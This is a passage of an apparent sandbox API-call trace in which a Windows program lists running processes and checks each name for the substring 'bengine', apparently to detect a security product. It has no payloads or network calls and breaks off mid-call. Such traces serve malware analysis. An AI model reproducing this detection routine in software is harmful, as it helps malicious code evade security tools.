lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.299] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356ed78 [0101.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x356ed78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0101.299] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0101.299] StrStrIA (lpFirst="smss.exe", lpSrch="bengine") returned 0x0 [0101.299] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.300] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356edd8 [0101.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x356edd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0101.300] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0101.300] StrStrIA (lpFirst="csrss.exe", lpSrch="bengine") returned 0x0 [0101.300] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.301] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ee98 [0101.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x356ee98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0101.302] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0101.302] StrStrIA (lpFirst="wininit.exe", lpSrch="bengine") returned 0x0 [0101.302] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.303] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356ed90 [0101.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x356ed90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0101.303] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0101.303] StrStrIA (lpFirst="csrss.exe", lpSrch="bengine") returned 0x0 [0101.303] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.304] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356edf0 [0101.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x356edf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0101.304] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0101.304] StrStrIA (lpFirst="winlogon.exe", lpSrch="bengine") returned 0x0 [0101.304] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.305] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356ef28 [0101.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x356ef28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0101.305] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0101.305] StrStrIA (lpFirst="services.exe", lpSrch="bengine") returned 0x0 [0101.305] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.306] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356eef8 [0101.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x356eef8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0101.306] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0101.306] StrStrIA (lpFirst="lsass.exe", lpSrch="bengine") returned 0x0 [0101.306] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.307] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ee38 [0101.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356ee38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.307] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.307] StrStrIA (lpFirst="svchost.exe", lpSrch="bengine") returned 0x0 [0101.307] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0101.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.308] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356ee20 [0101.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x356ee20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0101.309] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0101.309] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="bengine") returned 0x0 [0101.309] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0101.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.310] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356ee50 [0101.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x356ee50, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0101.310] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0101.310] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="bengine") returned 0x0 [0101.310] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.311] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356eee0 [0101.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356eee0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.311] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.311] StrStrIA (lpFirst="svchost.exe", lpSrch="bengine") returned 0x0 [0101.311] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0101.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0101.312] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e238 [0101.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x357e238, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0101.312] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0101.312] StrStrIA (lpFirst="dwm.exe", lpSrch="bengine") returned 0x0 [0101.312] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.313] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ef70 [0101.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356ef70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.313] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.313] StrStrIA (lpFirst="svchost.exe", lpSrch="bengine") returned 0x0 [0101.313] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.314] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356eeb0 [0101.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356eeb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.314] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.314] StrStrIA (lpFirst="svchost.exe", lpSrch="bengine") returned 0x0 [0101.314] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.315] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ef40 [0101.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.316] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.316] StrStrIA (lpFirst="svchost.exe", lpSrch="bengine") returned 0x0 [0101.316] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.317] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ee68 [0101.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356ee68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.317] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.317] StrStrIA (lpFirst="svchost.exe", lpSrch="bengine") returned 0x0 [0101.317] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.318] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356eec8 [0101.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356eec8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.318] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.318] StrStrIA (lpFirst="svchost.exe", lpSrch="bengine") returned 0x0 [0101.318] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.319] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ef88 [0101.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356ef88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.319] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.319] StrStrIA (lpFirst="svchost.exe", lpSrch="bengine") returned 0x0 [0101.319] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.320] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356eca0 [0101.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356eca0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.320] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.320] StrStrIA (lpFirst="svchost.exe", lpSrch="bengine") returned 0x0 [0101.321] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.322] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ef58 [0101.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356ef58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.322] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.322] StrStrIA (lpFirst="svchost.exe", lpSrch="bengine") returned 0x0 [0101.322] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.335] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f018 [0101.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f018, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.336] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.336] StrStrIA (lpFirst="svchost.exe", lpSrch="bengine") returned 0x0 [0101.336] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.337] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f288 [0101.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f288, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.337] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.337] StrStrIA (lpFirst="svchost.exe", lpSrch="bengine") returned 0x0 [0101.337] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.338] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f030 [0101.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x356f030, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0101.339] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0101.339] StrStrIA (lpFirst="spoolsv.exe", lpSrch="bengine") returned 0x0 [0101.339] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, 